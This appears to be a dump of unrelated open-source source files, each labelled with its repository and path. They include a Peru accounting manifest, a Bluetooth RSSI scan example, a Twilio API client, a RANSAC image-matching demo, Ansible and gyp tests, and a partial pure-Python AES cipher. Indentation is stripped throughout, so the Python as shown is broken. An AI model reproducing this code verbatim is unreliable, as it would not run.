# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Peru Localization Chart Account",
"version": "1.0",
"description": """
Peruvian accounting chart and tax localization. Acording the PCGE 2010
Plan contable peruano e impuestos de acuerdo a disposiciones vigentes de la SUNAT 2011 (PCGE 2010)
""",
"author": ["Cubic ERP"],
"website": "http://cubicERP.com",
"category": "Localization/Account Charts",
"depends": [
"account_chart",
],
"data":[
"account_tax_code.xml",
"l10n_pe_chart.xml",
"account_tax.xml",
"l10n_pe_wizard.xml",
],
"demo_xml": [
],
"update_xml": [
],
"active": False,
"installable": True,
"certificate" : "0045046493412",
'images': ['images/config_chart_l10n_pe.jpeg','images/l10n_pe_chart.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
BeATz-UnKNoWN/python-for-android
|
refs/heads/master
|
python-modules/pybluez/examples/advanced/inquiry-with-rssi.py
|
47
|
# performs a simple device inquiry, followed by a remote name request of each
# discovered device
import os
import sys
import struct
import bluetooth._bluetooth as bluez
def printpacket(pkt):
for c in pkt:
sys.stdout.write("%02x " % struct.unpack("B",c)[0])
print
def read_inquiry_mode(sock):
"""returns the current mode, or -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# read_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE);
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# first read the current inquiry mode.
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE )
pkt = sock.recv(255)
status,mode = struct.unpack("xxxxxxBB", pkt)
if status != 0: mode = -1
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return mode
def write_inquiry_mode(sock, mode):
"""returns 0 on success, -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# write_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE);
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# send the command!
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE, struct.pack("B", mode) )
pkt = sock.recv(255)
status = struct.unpack("xxxxxxB", pkt)[0]
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
if status != 0: return -1
return 0
def device_inquiry_with_with_rssi(sock):
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# perform a device inquiry on bluetooth device #0
# The inquiry should last 8 * 1.28 = 10.24 seconds
# before the inquiry is performed, bluez should flush its cache of
# previously discovered devices
flt = bluez.hci_filter_new()
bluez.hci_filter_all_events(flt)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
duration = 4
max_responses = 255
cmd_pkt = struct.pack("BBBBB", 0x33, 0x8b, 0x9e, duration, max_responses)
bluez.hci_send_cmd(sock, bluez.OGF_LINK_CTL, bluez.OCF_INQUIRY, cmd_pkt)
results = []
done = False
while not done:
pkt = sock.recv(255)
ptype, event, plen = struct.unpack("BBB", pkt[:3])
if event == bluez.EVT_INQUIRY_RESULT_WITH_RSSI:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
rssi = struct.unpack("b", pkt[1+13*nrsp+i])[0]
results.append( ( addr, rssi ) )
print "[%s] RSSI: [%d]" % (addr, rssi)
elif event == bluez.EVT_INQUIRY_COMPLETE:
done = True
elif event == bluez.EVT_CMD_STATUS:
status, ncmd, opcode = struct.unpack("BBH", pkt[3:7])
if status != 0:
print "uh oh..."
printpacket(pkt[3:7])
done = True
elif event == bluez.EVT_INQUIRY_RESULT:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
results.append( ( addr, -1 ) )
print "[%s] (no RRSI)" % addr
else:
print "unrecognized packet type 0x%02x" % ptype
print "event ", event
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return results
dev_id = 0
try:
sock = bluez.hci_open_dev(dev_id)
except:
print "error accessing bluetooth device..."
sys.exit(1)
try:
mode = read_inquiry_mode(sock)
except Exception, e:
print "error reading inquiry mode. "
print "Are you sure this a bluetooth 1.2 device?"
print e
sys.exit(1)
print "current inquiry mode is %d" % mode
if mode != 1:
print "writing inquiry mode..."
try:
result = write_inquiry_mode(sock, 1)
except Exception, e:
print "error writing inquiry mode. Are you sure you're root?"
print e
sys.exit(1)
if result != 0:
print "error while setting inquiry mode"
print "result: %d" % result
device_inquiry_with_with_rssi(sock)
|
whyscream/dspam-milter
|
refs/heads/master
|
dspam/__init__.py
|
1
|
# Copyright (c) 2012, Tom Hendrikx
# All rights reserved.
#
# See LICENSE for the license.
VERSION = '0.3.5.dev0'
|
mdrumond/tensorflow
|
refs/heads/master
|
tensorflow/python/training/queue_runner.py
|
139
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create threads to run multiple enqueue ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.training.queue_runner_impl import *
# pylint: enable=wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = [
# Documented in training.py:
"QueueRunner",
"add_queue_runner",
"start_queue_runners",
]
remove_undocumented(__name__, _allowed_symbols)
|
PyFilesystem/pyfilesystem
|
refs/heads/master
|
fs/expose/serve/__init__.py
|
20
|
# Work in progress
|
rahulunair/nova
|
refs/heads/master
|
nova/api/openstack/compute/__init__.py
|
10
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# The APIRouterV21 moves down to the 'nova.api.openstack.compute.routes' for
# circle reference problem. Import the APIRouterV21 is for the api-paste.ini
# works correctly without modification. We still looking for a chance to move
# the APIRouterV21 back to here after cleanups.
from nova.api.openstack.compute.routes import APIRouterV21 # noqa
|
ducksboard/libsaas
|
refs/heads/master
|
libsaas/services/twilio/numbers.py
|
4
|
from libsaas import http, parsers
from libsaas.services import base
from libsaas.services.twilio import resource
class AvailablePhoneNumbersBase(resource.TwilioResource):
path = '{0}'
def get_url(self):
path = self.path.format(self.object_id)
return '{0}/{1}'.format(self.parent.get_url(), path)
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class AvailablePhoneNumbersLocal(AvailablePhoneNumbersBase):
path = '{0}/Local'
@base.apimethod
def get(self, AreaCode=None, Contains=None, InRegion=None,
InPostalCode=None, NearLatLong=None, NearNumber=None, InLata=None,
InRateCenter=None, Distance=None):
"""
Fetch available local phone numbers for an account.
:var AreaCode: Find phone numbers in the specified area code.
:vartype AreaCode: str
:var Contains: A pattern to match phone numbers on.
Valid characters are `*` and [0-9a-zA-Z].
The `*` character will match any single digit.
:vartype Contains: str
:var InRegion: Limit results to a particular region (State/Province).
Given a phone number, search within the same Region as that number.
(US and Canada only)
:vartype InRegion: str
:var InPostalCode: Limit results to a particular postal code.
Given a phone number, search within the same postal code as
that number. (US and Canada only)
:vartype InPostalCode: str
:var NearLatLong: Given a latitude/longitude pair lat,long find
geographically close numbers within Distance miles.
(US and Canada only)
:vartype NearLatLong: str
:var NearNumber: Given a phone number, find a geographically close
number within Distance miles. Distance defaults to 25 miles.
(US and Canada only)
:vartype NearNumber: str
:var InLata: Limit results to a specific Local access and transport
area (LATA). Given a phone number, search within the same LATA
as that number.
(US and Canada only)
:vartype InLata: str
:var InRateCenter: Limit results to a specific rate center,
or given a phone number search within the same rate center as
that number. Requires InLata to be set as well.
(US and Canada only)
:vartype InRateCenter: str
:var InDistance: Specifies the search radius for a Near- query in miles.
If not specified this defaults to 25 miles.
(US and Canada only)
:vartype InDistance: int
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class AvailablePhoneNumbersTollFree(AvailablePhoneNumbersBase):
path = '{0}/TollFree'
@base.apimethod
def get(self, AreaCode=None, Contains=None):
"""
Fetch available toll-free phone numbers for an account.
:var AreaCode: Find phone numbers in the specified area code.
:vartype AreaCode: str
:var Contains: A pattern to match phone numbers on.
Valid characters are `*` and [0-9a-zA-Z].
The `*` character will match any single digit.
:vartype Contains: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class AvailablePhoneNumbers(AvailablePhoneNumbersBase):
path = 'AvailablePhoneNumbers'
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
@base.resource(AvailablePhoneNumbersLocal)
def local(self, country_code):
"""
Return a list of local AvailablePhoneNumber resource representations
that match the specified filters, each representing a phone number
that is currently available for provisioning within this account.
"""
return AvailablePhoneNumbersLocal(self, country_code)
@base.resource(AvailablePhoneNumbersTollFree)
def toll_free(self, country_code):
"""
Return a list of toll-free AvailablePhoneNumber resource
representations that match the specified filters, each representing
a phone number that is currently available for provisioning within
this account.
"""
return AvailablePhoneNumbersTollFree(self, country_code)
class IncomingPhoneNumbersBase(resource.TwilioResource):
path = 'IncomingPhoneNumbers'
class IncomingPhoneNumber(IncomingPhoneNumbersBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class IncomingPhoneNumbersMixin(IncomingPhoneNumbersBase):
@base.apimethod
def get(self, PhoneNumber=None, FriendlyName=None,
Page=None, PageSize=None, AfterSid=None):
"""
Fetch incoming phone numbers list for an account.
:var PhoneNumber: Only show the incoming phone number resources
that match this pattern. You can specify partial numbers and
use `*` as a wildcard for any digit.
:vartype PhoneNumber: str
:var FriendlyName: Only show the incoming phone number resources
with friendly names that exactly match this name.
:vartype FriendlyName: str
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class IncomingPhoneNumbersLocal(IncomingPhoneNumbersMixin):
path = 'Local'
class IncomingPhoneNumbersTollFree(IncomingPhoneNumbersMixin):
path = 'TollFree'
class IncomingPhoneNumbers(IncomingPhoneNumbersMixin):
@base.resource(IncomingPhoneNumbersLocal)
def local(self):
return IncomingPhoneNumbersLocal(self)
@base.resource(IncomingPhoneNumbersTollFree)
def toll_free(self):
return IncomingPhoneNumbersTollFree(self)
class OutgoingCallerIdsBase(resource.TwilioResource):
path = 'OutgoingCallerIds'
class OutgoingCallerId(OutgoingCallerIdsBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class OutgoingCallerIds(OutgoingCallerIdsBase):
@base.apimethod
def get(self, PhoneNumber=None, FriendlyName=None,
Page=None, PageSize=None, AfterSid=None):
"""
Fetch outgoing caller ids for an account.
:var PhoneNumber: Only show the incoming phone number resources
that match this pattern. You can specify partial numbers and
use `*` as a wildcard for any digit.
:vartype PhoneNumber: str
:var FriendlyName: Only show the incoming phone number resources
with friendly names that exactly match this name.
:vartype FriendlyName: str
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
|
GGoussar/scikit-image
|
refs/heads/master
|
doc/examples/transform/plot_matching.py
|
21
|
"""
============================
Robust matching using RANSAC
============================
In this simplified example we first generate two synthetic images as if they
were taken from different view points.
In the next step we find interest points in both images and find
correspondences based on a weighted sum of squared differences of a small
neighborhood around them. Note, that this measure is only robust towards
linear radiometric and not geometric distortions and is thus only usable with
slight view point changes.
After finding the correspondences we end up having a set of source and
destination coordinates which can be used to estimate the geometric
transformation between both images. However, many of the correspondences are
faulty and simply estimating the parameter set with all coordinates is not
sufficient. Therefore, the RANSAC algorithm is used on top of the normal model
to robustly estimate the parameter set by detecting outliers.
"""
from __future__ import print_function
import numpy as np
from matplotlib import pyplot as plt
from skimage import data
from skimage.util import img_as_float
from skimage.feature import (corner_harris, corner_subpix, corner_peaks,
plot_matches)
from skimage.transform import warp, AffineTransform
from skimage.exposure import rescale_intensity
from skimage.color import rgb2gray
from skimage.measure import ransac
# generate synthetic checkerboard image and add gradient for the later matching
checkerboard = img_as_float(data.checkerboard())
img_orig = np.zeros(list(checkerboard.shape) + [3])
img_orig[..., 0] = checkerboard
gradient_r, gradient_c = (np.mgrid[0:img_orig.shape[0],
0:img_orig.shape[1]]
/ float(img_orig.shape[0]))
img_orig[..., 1] = gradient_r
img_orig[..., 2] = gradient_c
img_orig = rescale_intensity(img_orig)
img_orig_gray = rgb2gray(img_orig)
# warp synthetic image
tform = AffineTransform(scale=(0.9, 0.9), rotation=0.2, translation=(20, -10))
img_warped = warp(img_orig, tform.inverse, output_shape=(200, 200))
img_warped_gray = rgb2gray(img_warped)
# extract corners using Harris' corner measure
coords_orig = corner_peaks(corner_harris(img_orig_gray), threshold_rel=0.001,
min_distance=5)
coords_warped = corner_peaks(corner_harris(img_warped_gray),
threshold_rel=0.001, min_distance=5)
# determine sub-pixel corner position
coords_orig_subpix = corner_subpix(img_orig_gray, coords_orig, window_size=9)
coords_warped_subpix = corner_subpix(img_warped_gray, coords_warped,
window_size=9)
def gaussian_weights(window_ext, sigma=1):
y, x = np.mgrid[-window_ext:window_ext+1, -window_ext:window_ext+1]
g = np.zeros(y.shape, dtype=np.double)
g[:] = np.exp(-0.5 * (x**2 / sigma**2 + y**2 / sigma**2))
g /= 2 * np.pi * sigma * sigma
return g
def match_corner(coord, window_ext=5):
r, c = np.round(coord).astype(np.intp)
window_orig = img_orig[r-window_ext:r+window_ext+1,
c-window_ext:c+window_ext+1, :]
# weight pixels depending on distance to center pixel
weights = gaussian_weights(window_ext, 3)
weights = np.dstack((weights, weights, weights))
# compute sum of squared differences to all corners in warped image
SSDs = []
for cr, cc in coords_warped:
window_warped = img_warped[cr-window_ext:cr+window_ext+1,
cc-window_ext:cc+window_ext+1, :]
SSD = np.sum(weights * (window_orig - window_warped)**2)
SSDs.append(SSD)
# use corner with minimum SSD as correspondence
min_idx = np.argmin(SSDs)
return coords_warped_subpix[min_idx]
# find correspondences using simple weighted sum of squared differences
src = []
dst = []
for coord in coords_orig_subpix:
src.append(coord)
dst.append(match_corner(coord))
src = np.array(src)
dst = np.array(dst)
# estimate affine transform model using all coordinates
model = AffineTransform()
model.estimate(src, dst)
# robustly estimate affine transform model with RANSAC
model_robust, inliers = ransac((src, dst), AffineTransform, min_samples=3,
residual_threshold=2, max_trials=100)
outliers = inliers == False
# compare "true" and estimated transform parameters
print(tform.scale, tform.translation, tform.rotation)
print(model.scale, model.translation, model.rotation)
print(model_robust.scale, model_robust.translation, model_robust.rotation)
# visualize correspondence
fig, ax = plt.subplots(nrows=2, ncols=1)
plt.gray()
inlier_idxs = np.nonzero(inliers)[0]
plot_matches(ax[0], img_orig_gray, img_warped_gray, src, dst,
np.column_stack((inlier_idxs, inlier_idxs)), matches_color='b')
ax[0].axis('off')
ax[0].set_title('Correct correspondences')
outlier_idxs = np.nonzero(outliers)[0]
plot_matches(ax[1], img_orig_gray, img_warped_gray, src, dst,
np.column_stack((outlier_idxs, outlier_idxs)), matches_color='r')
ax[1].axis('off')
ax[1].set_title('Faulty correspondences')
plt.show()
|
pgmillon/ansible
|
refs/heads/devel
|
test/units/parsing/test_splitter.py
|
117
|
# coding: utf-8
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.parsing.splitter import split_args, parse_kv
import pytest
SPLIT_DATA = (
(u'a',
[u'a'],
{u'_raw_params': u'a'}),
(u'a=b',
[u'a=b'],
{u'a': u'b'}),
(u'a="foo bar"',
[u'a="foo bar"'],
{u'a': u'foo bar'}),
(u'"foo bar baz"',
[u'"foo bar baz"'],
{u'_raw_params': '"foo bar baz"'}),
(u'foo bar baz',
[u'foo', u'bar', u'baz'],
{u'_raw_params': u'foo bar baz'}),
(u'a=b c="foo bar"',
[u'a=b', u'c="foo bar"'],
{u'a': u'b', u'c': u'foo bar'}),
(u'a="echo \\"hello world\\"" b=bar',
[u'a="echo \\"hello world\\""', u'b=bar'],
{u'a': u'echo "hello world"', u'b': u'bar'}),
(u'a="multi\nline"',
[u'a="multi\nline"'],
{u'a': u'multi\nline'}),
(u'a="blank\n\nline"',
[u'a="blank\n\nline"'],
{u'a': u'blank\n\nline'}),
(u'a="blank\n\n\nlines"',
[u'a="blank\n\n\nlines"'],
{u'a': u'blank\n\n\nlines'}),
(u'a="a long\nmessage\\\nabout a thing\n"',
[u'a="a long\nmessage\\\nabout a thing\n"'],
{u'a': u'a long\nmessage\\\nabout a thing\n'}),
(u'a="multiline\nmessage1\\\n" b="multiline\nmessage2\\\n"',
[u'a="multiline\nmessage1\\\n"', u'b="multiline\nmessage2\\\n"'],
{u'a': 'multiline\nmessage1\\\n', u'b': u'multiline\nmessage2\\\n'}),
(u'a={{jinja}}',
[u'a={{jinja}}'],
{u'a': u'{{jinja}}'}),
(u'a={{ jinja }}',
[u'a={{ jinja }}'],
{u'a': u'{{ jinja }}'}),
(u'a="{{jinja}}"',
[u'a="{{jinja}}"'],
{u'a': u'{{jinja}}'}),
(u'a={{ jinja }}{{jinja2}}',
[u'a={{ jinja }}{{jinja2}}'],
{u'a': u'{{ jinja }}{{jinja2}}'}),
(u'a="{{ jinja }}{{jinja2}}"',
[u'a="{{ jinja }}{{jinja2}}"'],
{u'a': u'{{ jinja }}{{jinja2}}'}),
(u'a={{jinja}} b={{jinja2}}',
[u'a={{jinja}}', u'b={{jinja2}}'],
{u'a': u'{{jinja}}', u'b': u'{{jinja2}}'}),
(u'a="{{jinja}}\n" b="{{jinja2}}\n"',
[u'a="{{jinja}}\n"', u'b="{{jinja2}}\n"'],
{u'a': u'{{jinja}}\n', u'b': u'{{jinja2}}\n'}),
(u'a="café eñyei"',
[u'a="café eñyei"'],
{u'a': u'café eñyei'}),
(u'a=café b=eñyei',
[u'a=café', u'b=eñyei'],
{u'a': u'café', u'b': u'eñyei'}),
(u'a={{ foo | some_filter(\' \', " ") }} b=bar',
[u'a={{ foo | some_filter(\' \', " ") }}', u'b=bar'],
{u'a': u'{{ foo | some_filter(\' \', " ") }}', u'b': u'bar'}),
(u'One\n Two\n Three\n',
[u'One\n ', u'Two\n ', u'Three\n'],
{u'_raw_params': u'One\n Two\n Three\n'}),
)
SPLIT_ARGS = ((test[0], test[1]) for test in SPLIT_DATA)
PARSE_KV = ((test[0], test[2]) for test in SPLIT_DATA)
@pytest.mark.parametrize("args, expected", SPLIT_ARGS)
def test_split_args(args, expected):
assert split_args(args) == expected
@pytest.mark.parametrize("args, expected", PARSE_KV)
def test_parse_kv(args, expected):
assert parse_kv(args) == expected
|
BobCromwell/gyp
|
refs/heads/master
|
test/win/gyptest-link-update-manifest.py
|
226
|
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure binary is relinked when manifest settings are changed.
"""
import TestGyp
import os
import sys
if sys.platform == 'win32':
import pywintypes
import win32api
import winerror
RT_MANIFEST = 24
class LoadLibrary(object):
"""Context manager for loading and releasing binaries in Windows.
Yields the handle of the binary loaded."""
def __init__(self, path):
self._path = path
self._handle = None
def __enter__(self):
self._handle = win32api.LoadLibrary(self._path)
return self._handle
def __exit__(self, type, value, traceback):
win32api.FreeLibrary(self._handle)
def extract_manifest(path, resource_name):
"""Reads manifest from |path| and returns it as a string.
Returns None is there is no such manifest."""
with LoadLibrary(path) as handle:
try:
return win32api.LoadResource(handle, RT_MANIFEST, resource_name)
except pywintypes.error as error:
if error.args[0] == winerror.ERROR_RESOURCE_DATA_NOT_FOUND:
return None
else:
raise
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
gyp_template = '''
{
'targets': [
{
'target_name': 'test_update_manifest',
'type': 'executable',
'sources': ['hello.cc'],
'msvs_settings': {
'VCLinkerTool': {
'EnableUAC': 'true',
'UACExecutionLevel': '%(uac_execution_level)d',
},
'VCManifestTool': {
'EmbedManifest': 'true',
'AdditionalManifestFiles': '%(additional_manifest_files)s',
},
},
},
],
}
'''
gypfile = 'update-manifest.gyp'
def WriteAndUpdate(uac_execution_level, additional_manifest_files, do_build):
with open(os.path.join(CHDIR, gypfile), 'wb') as f:
f.write(gyp_template % {
'uac_execution_level': uac_execution_level,
'additional_manifest_files': additional_manifest_files,
})
test.run_gyp(gypfile, chdir=CHDIR)
if do_build:
test.build(gypfile, chdir=CHDIR)
exe_file = test.built_file_path('test_update_manifest.exe', chdir=CHDIR)
return extract_manifest(exe_file, 1)
manifest = WriteAndUpdate(0, '', True)
test.fail_test('asInvoker' not in manifest)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' in manifest)
# Make sure that updating .gyp and regenerating doesn't cause a rebuild.
WriteAndUpdate(0, '', False)
test.up_to_date(gypfile, test.ALL, chdir=CHDIR)
# But make sure that changing a manifest property does cause a relink.
manifest = WriteAndUpdate(2, '', True)
test.fail_test('requireAdministrator' not in manifest)
# Adding a manifest causes a rebuild.
manifest = WriteAndUpdate(2, 'extra.manifest', True)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' not in manifest)
|
cristianveron/HACKERS-ADDONS
|
refs/heads/master
|
pyaes.py
|
189
|
"""Simple AES cipher implementation in pure Python following PEP-272 API
Homepage: https://bitbucket.org/intgr/pyaes/
The goal of this module is to be as fast as reasonable in Python while still
being Pythonic and readable/understandable. It is licensed under the permissive
MIT license.
Hopefully the code is readable and commented enough that it can serve as an
introduction to the AES cipher for Python coders. In fact, it should go along
well with the Stick Figure Guide to AES:
http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Contrary to intuition, this implementation numbers the 4x4 matrices from top to
bottom for efficiency reasons::
0 4 8 12
1 5 9 13
2 6 10 14
3 7 11 15
Effectively it's the transposition of what you'd expect. This actually makes
the code simpler -- except the ShiftRows step, but hopefully the explanation
there clears it up.
"""
####
# Copyright (c) 2010 Marti Raudsepp <marti@juffo.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
####
from array import array
# Globals mandated by PEP 272:
# http://www.python.org/dev/peps/pep-0272/
MODE_ECB = 1
MODE_CBC = 2
#MODE_CTR = 6
block_size = 16
key_size = None
def new(key, mode, IV=None):
if mode == MODE_ECB:
return ECBMode(AES(key))
elif mode == MODE_CBC:
if IV is None:
raise ValueError, "CBC mode needs an IV value!"
return CBCMode(AES(key), IV)
else:
raise NotImplementedError
#### AES cipher implementation
class AES(object):
block_size = 16
def __init__(self, key):
self.setkey(key)
def setkey(self, key):
"""Sets the key and performs key expansion."""
self.key = key
self.key_size = len(key)
if self.key_size == 16:
self.rounds = 10
elif self.key_size == 24:
self.rounds = 12
elif self.key_size == 32:
self.rounds = 14
else:
raise ValueError, "Key length must be 16, 24 or 32 bytes"
self.expand_key()
def expand_key(self):
"""Performs AES key expansion on self.key and stores in self.exkey"""
# The key schedule specifies how parts of the key are fed into the
# cipher's round functions. "Key expansion" means performing this
# schedule in advance. Almost all implementations do this.
#
# Here's a description of AES key schedule:
# http://en.wikipedia.org/wiki/Rijndael_key_schedule
# The expanded key starts with the actual key itself
exkey = array('B', self.key)
# extra key expansion steps
if self.key_size == 16:
extra_cnt = 0
elif self.key_size == 24:
extra_cnt = 2
else:
extra_cnt = 3
# 4-byte temporary variable for key expansion
word = exkey[-4:]
# Each expansion cycle uses 'i' once for Rcon table lookup
for i in xrange(1, 11):
#### key schedule core:
# left-rotate by 1 byte
word = word[1:4] + word[0:1]
# apply S-box to all bytes
for j in xrange(4):
word[j] = aes_sbox[word[j]]
# apply the Rcon table to the leftmost byte
word[0] = word[0] ^ aes_Rcon[i]
#### end key schedule core
for z in xrange(4):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
# Last key expansion cycle always finishes here
if len(exkey) >= (self.rounds+1) * self.block_size:
break
# Special substitution step for 256-bit key
if self.key_size == 32:
for j in xrange(4):
# mix in bytes from the last subkey XORed with S-box of
# current word bytes
word[j] = aes_sbox[word[j]] ^ exkey[-self.key_size + j]
exkey.extend(word)
# Twice for 192-bit key, thrice for 256-bit key
for z in xrange(extra_cnt):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
self.exkey = exkey
def add_round_key(self, block, round):
"""AddRoundKey step in AES. This is where the key is mixed into plaintext"""
offset = round * 16
exkey = self.exkey
for i in xrange(16):
block[i] ^= exkey[offset + i]
#print 'AddRoundKey:', block
def sub_bytes(self, block, sbox):
"""SubBytes step, apply S-box to all bytes
Depending on whether encrypting or decrypting, a different sbox array
is passed in.
"""
for i in xrange(16):
block[i] = sbox[block[i]]
#print 'SubBytes :', block
def shift_rows(self, b):
"""ShiftRows step. Shifts 2nd row to left by 1, 3rd row by 2, 4th row by 3
Since we're performing this on a transposed matrix, cells are numbered
from top to bottom::
0 4 8 12 -> 0 4 8 12 -- 1st row doesn't change
1 5 9 13 -> 5 9 13 1 -- row shifted to left by 1 (wraps around)
2 6 10 14 -> 10 14 2 6 -- shifted by 2
3 7 11 15 -> 15 3 7 11 -- shifted by 3
"""
b[1], b[5], b[ 9], b[13] = b[ 5], b[ 9], b[13], b[ 1]
b[2], b[6], b[10], b[14] = b[10], b[14], b[ 2], b[ 6]
b[3], b[7], b[11], b[15] = b[15], b[ 3], b[ 7], b[11]
#print 'ShiftRows :', b
def shift_rows_inv(self, b):
"""Similar to shift_rows above, but performed in inverse for decryption."""
b[ 5], b[ 9], b[13], b[ 1] = b[1], b[5], b[ 9], b[13]
b[10], b[14], b[ 2], b[ 6] = b[2], b[6], b[10], b[14]
b[15], b[ 3], b[ 7], b[11] = b[3], b[7], b[11], b[15]
